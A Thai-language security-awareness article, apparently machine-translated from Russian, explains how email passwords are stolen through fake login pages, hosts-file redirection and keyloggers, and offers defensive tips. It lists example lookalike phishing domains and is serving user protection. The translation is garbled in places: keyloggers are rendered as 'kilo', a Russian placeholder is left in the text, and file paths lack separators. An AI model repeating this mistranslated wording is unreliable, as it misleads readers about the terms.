ในช่วงไม่กี่วันที่ผ่านมา มีข่าวว่ามีการโพสต์ข้อมูลการเข้าสู่ระบบและรหัสผ่านจากกล่องจดหมายหลายล้านกล่องของ Google mail (Gmail), Yandex mail และ mail.ru บนอินเทอร์เน็ต เป็นไปไม่ได้ที่จะรับรหัสผ่านที่ซับซ้อนมากหรือน้อย เนื่องจากบริการส่วนใหญ่ได้รับการกำหนดค่าในลักษณะที่หลังจากเกิดข้อผิดพลาดหลายครั้ง ผู้ใช้จะป้อน captcha หรือเพียงแค่บล็อก IP ที่มีการบังคับเดรัจฉาน การรั่วไหลของรหัสผ่านส่วนใหญ่ไม่ใช่ความผิดของการแฮ็กบริการยอดนิยมที่มีไหวพริบ แต่สำหรับผู้ใช้เองที่ปล่อยให้รหัสผ่านถูกบุกรุก ดังนั้นฉันอยากจะพูดถึงคำถามที่ว่าแฮ็กเกอร์ขโมยรหัสผ่านของคุณอย่างไรและจะทำอย่างไรเพื่อป้องกันสิ่งนี้

1. หน้าเข้าสู่ระบบปลอม

บรรทัดล่างคือนี้ ภายใต้ข้ออ้างใด ๆ ผู้ใช้ถูกล่อลวงไปยังไซต์ของแฮ็กเกอร์ บ่อยครั้งที่ไซต์นี้มีเพียงหน้าเดียว แต่ดูเหมือนว่าหน้าการให้สิทธิ์จริงในกล่องจดหมายของคุณทุกประการ ผู้ใช้ที่ไม่ตั้งใจป้อนชื่อผู้ใช้และรหัสผ่าน ซึ่งส่งตรงไปยังผู้โจมตี

วิธีการต่อสู้:

- ทุกครั้งเมื่อต้องมีการอนุญาต ให้ดูที่โดเมน บ่อยครั้งที่ผู้โจมตีสามารถสร้างชื่อโดเมนที่สอดคล้องกัน ตัวอย่างเช่น:

www.mail.ru.free-host.net

www.yandex-ru.spb.ru

www.gmail-com.com

www.yandex.ru.mail.redte.ru

www.turian.ru/mail.ru

www.mail-compose.ru/yandex

145.35.77.1/mail.ru

แต่ละโดเมนเหล่านี้ไม่มีส่วนเกี่ยวข้องกับบริการอีเมลยอดนิยม ตามกฎแล้ว ไม่มีการร้องขอการอนุญาตทุกครั้ง ดังนั้นก่อนที่จะป้อนรหัสผ่าน ควรใช้เวลาในการค้นคว้าข้อมูลชื่อโดเมน

นอกจากนี้ คุณควรให้ความสนใจกับวิธีที่แฮ็กเกอร์พยายามหลอกล่อคุณไปยังหน้าที่เป็นอันตรายของพวกเขา ฉันจะให้บางตัวอย่าง แต่ไม่ จำกัด เฉพาะตัวเลือก:

- คุณได้รับจดหมายทางไปรษณีย์แจ้งว่าคุณได้รับบางอย่าง (ไปรษณียบัตรหรือสิ่งอื่นที่ถูกใจ หรือในทางกลับกัน - สิ่งที่ไม่พึงประสงค์อย่างยิ่งและคุณต้องดำเนินการทันทีเพื่อไม่ให้บัญชีของคุณไม่ถูกบล็อก เงินไม่สูญหาย ฯลฯ) และมีลิงก์ที่คุณต้องติดตาม

- SMS แจ้งว่าคุณได้รับจดหมายและเชิญให้ไปตามลิงค์เพื่ออ่านจดหมายนี้ (เพื่อให้สมองดับในผู้ชายก็สามารถชี้แจงได้ว่าจดหมายนั้น<любое женское имя>).

- ในหน้าต่างป๊อปอัปบนเว็บไซต์หรือในโปรแกรม มีรายงานว่าคุณได้รับอีเมล

จำไว้แค่นี้ระวังไว้ ใส่ใจกับสิ่งเล็กน้อย ตัวอย่างเช่น เรามักจะเลือกตัวเลือก "บันทึกรหัสผ่าน" ในเบราว์เซอร์ และเมื่อบริการอีเมลจริงขอให้อนุญาตอีกครั้ง (ซึ่งเกิดขึ้นเป็นครั้งคราว) หน้าต่างทั้งสอง (ทั้งการเข้าสู่ระบบและรหัสผ่าน) มักจะถูกกรอกไว้แล้ว และเราจำเป็นต้องกดปุ่มเข้าสู่ระบบเท่านั้น แฮ็กเกอร์สามารถป้อนชื่อผู้ใช้ของคุณ (โดยเฉพาะอย่างยิ่งหากพวกเขาส่งอีเมลลิงก์ที่เป็นอันตรายถึงคุณ) แต่แฮ็กเกอร์ไม่สามารถป้อนรหัสผ่านของคุณได้ ดังนั้น หากคุณสังเกตเห็นพฤติกรรมที่ผิดปกติ ให้ตรวจสอบโดเมนอย่างใกล้ชิด หากโดเมนถูกต้อง แต่ก็ยังมีบางอย่างผิดปกติ คุณอาจพบปัญหาอื่น ซึ่งจะกล่าวถึงในย่อหน้าถัดไป

2. เปลี่ยนเส้นทางผ่านไฟล์โฮสต์

คอมพิวเตอร์ที่ใช้ระบบปฏิบัติการ Windows จะมีไฟล์โฮสต์อยู่ในไดเร็กทอรี C:WindowsSystem32Driversetc

คุณสามารถลงทะเบียนการเปลี่ยนเส้นทางได้ที่นั่น ด้วยเหตุนี้โดเมนในแถบที่อยู่ของเบราว์เซอร์ของคุณจะเป็นจริงโดยสมบูรณ์ แต่ในความเป็นจริงคุณจะถูกนำไปที่หน้าการให้สิทธิ์ของแฮ็กเกอร์ที่จะขโมยรหัสผ่านของคุณ:

สิ่งที่ต้องค้นหา:

- เปิดไฟล์ C:WindowsSystem32Driversetchhosts ด้วยโปรแกรมแก้ไขข้อความและตรวจสอบ - ไม่ควรกล่าวถึงไซต์ยอดนิยมหรือบางสิ่งที่น่าสงสัย

- ตัวบ่งชี้อื่นคือคุณป้อนชื่อผู้ใช้และรหัสผ่านที่ถูกต้อง แต่การอนุญาตไม่เกิดขึ้น

- ในหน้าการให้สิทธิ์ ระบบจะขอให้คุณส่ง SMS ไปยังหมายเลขสั้นๆ ภายใต้ข้ออ้างใดๆ (การยืนยันทางโทรศัพท์ ความพยายามในการแฮ็กและการยืนยันว่าเป็นคุณ บัญชีไม่ได้ใช้งานและจะถูกลบหากไม่ได้รับการยืนยัน คุณต้องป้อนหมายเลขที่ได้รับในข้อความ SMS ตอบกลับ ฯลฯ)

วิธีจัดการกับมัน:

- โดยปกติแล้วไฟล์โฮสต์จะถูกเปลี่ยนโดยไวรัส คุณต้องติดตั้งโปรแกรมป้องกันไวรัส หากไม่มีให้ตรวจสอบคอมพิวเตอร์ หากคุณมีโปรแกรมป้องกันไวรัส ให้อัปเดตและตรวจสอบคอมพิวเตอร์ของคุณ

- ลบบรรทัดพิเศษออกจากไฟล์โฮสต์

3. โปรแกรมสำหรับติดตามการกดแป้นพิมพ์บนแป้นพิมพ์ (กิโล)

อีกทางเลือกหนึ่งคือกิโลเฮิร์ต นี่คือโปรแกรมที่สกัดกั้นทุกสิ่งที่คุณพิมพ์บนแป้นพิมพ์และส่งไปยังแฮ็กเกอร์ อันที่จริงแล้วสิ่งเหล่านี้คือไวรัส และคุณจำเป็นต้องจัดการกับโปรแกรมเหล่านี้ในลักษณะเดียวกับไวรัสอื่นๆ หากอีเมลของคุณถูก "แฮ็ก" อยู่ตลอดเวลา ให้ตรวจสอบคอมพิวเตอร์ของคุณด้วยโปรแกรมป้องกันไวรัส อย่าดาวน์โหลดไฟล์ปฏิบัติการที่น่าสงสัย (ไฟล์มีนามสกุล .exe, .msi, .hta, .scr อาจมีไฟล์อื่นๆ แต่ส่วนใหญ่มักจะเป็น .exe) ติดตั้งโปรแกรมป้องกันไวรัสที่สามารถอัปเดตได้ อัปเดตเป็นประจำ และตรวจสอบคอมพิวเตอร์ของคุณ (หรือเปลี่ยนไปใช้ Linux)

วิธีจัดการกับมัน:

- หากคุณพบไวรัส ในกรณีนี้ ให้เปลี่ยนรหัสผ่านของคุณจากเมลและโซเชียลเน็ตเวิร์ก

- สิ่งนี้ได้ถูกกล่าวถึงแล้ว แต่นี่เป็นข้อผิดพลาดทั่วไปที่ฉันเน้นย้ำอีกครั้ง อย่าดาวน์โหลดไฟล์ปฏิบัติการจากแหล่งที่น่าสงสัย ดาวน์โหลดได้จากเว็บไซต์อย่างเป็นทางการ อย่าดาวน์โหลดไฟล์ที่ส่งถึงคุณทางไปรษณีย์จากคนแปลกหน้า (แม้ว่าจะเป็นรูปถ่ายของ "ฉันในชุดว่ายน้ำ" ฯลฯ ก็ตาม) ระวังไฟล์ที่ปฏิบัติการได้ แม้ว่าไฟล์นั้นจะถูกส่งโดยคนที่คุณรู้จักก็ตาม - อาจเกิดขึ้นได้ว่าเมลของพวกเขาถูกแฮ็กก่อนหน้าคุณ และแฮ็กเกอร์จะส่งโปรแกรมที่เป็นอันตรายออกไปในนามของพวกเขา

- ในร้านอินเทอร์เน็ตคาเฟ่และในทุกสถานการณ์เมื่อคุณต้องการลงชื่อเข้าใช้คอมพิวเตอร์ของผู้อื่น ให้ใช้แป้นพิมพ์บนหน้าจอ นี่ไม่ใช่การรับประกัน 100% แต่สำหรับนักปั่นหลายกิโล การเลี้ยวครั้งนี้จะยากเกินไป

ไม่ว่ามันจะฟังดูน่าเบื่อแค่ไหน แต่มันก็เป็นเรื่องเล็กน้อยที่ผู้ใช้ส่วนใหญ่ทำรหัสผ่านหาย และไม่มีการโจมตีของแฮ็กเกอร์ที่ซับซ้อนในบริการอีเมลหรือการเข้ารหัสที่ซับซ้อนเกิดขึ้นที่นี่



ไม่พบคำตอบสำหรับคำถามของคุณ? ดูที่นี่
รีวิว Xiaomi Mi8 - เรือธงสุดล้ำ!รีวิว Xiaomi Mi8 - เรือธงสุดล้ำ!
เทคโนโลยีไร้สายที่จำเป็นมากเทคโนโลยีไร้สายที่จำเป็นมาก
ZUK Z1 - ข้อมูลจำเพาะZUK Z1 - ข้อมูลจำเพาะ